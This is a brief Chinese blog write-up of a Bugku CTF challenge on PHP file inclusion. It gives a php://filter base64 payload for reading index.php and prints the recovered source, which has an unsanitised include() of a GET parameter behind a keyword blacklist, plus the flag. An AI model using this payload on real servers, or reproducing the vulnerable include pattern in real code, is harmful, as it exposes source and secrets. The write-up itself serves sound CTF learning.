PHP教程

Bugku-12.文件包含-php伪协议

本文主要是介绍Bugku-12.文件包含-php伪协议,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!

image-20210812180647435

文件包含

image-20210812190426324

利用php伪协议读取

谈一谈php://filter的妙用 | 离别歌 (leavesongs.com)

?file=php://filter/read=convert.base64-encode/resource=index.php

image-20210812190645351

base64解码

<html>
    <title>Bugku-web</title>
    
<?php
	error_reporting(0);
	if(!$_GET[file]){echo '<a href="./index.php?file=show.php">click me? no</a>';}
	$file=$_GET['file'];
	if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
		echo "Oh no!";
		exit();
	}
	include($file); 
//flag:flag{61d755938dc1bb9f1a14c0eb7e017f85}
?>
</html>
这篇关于Bugku-12.文件包含-php伪协议的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!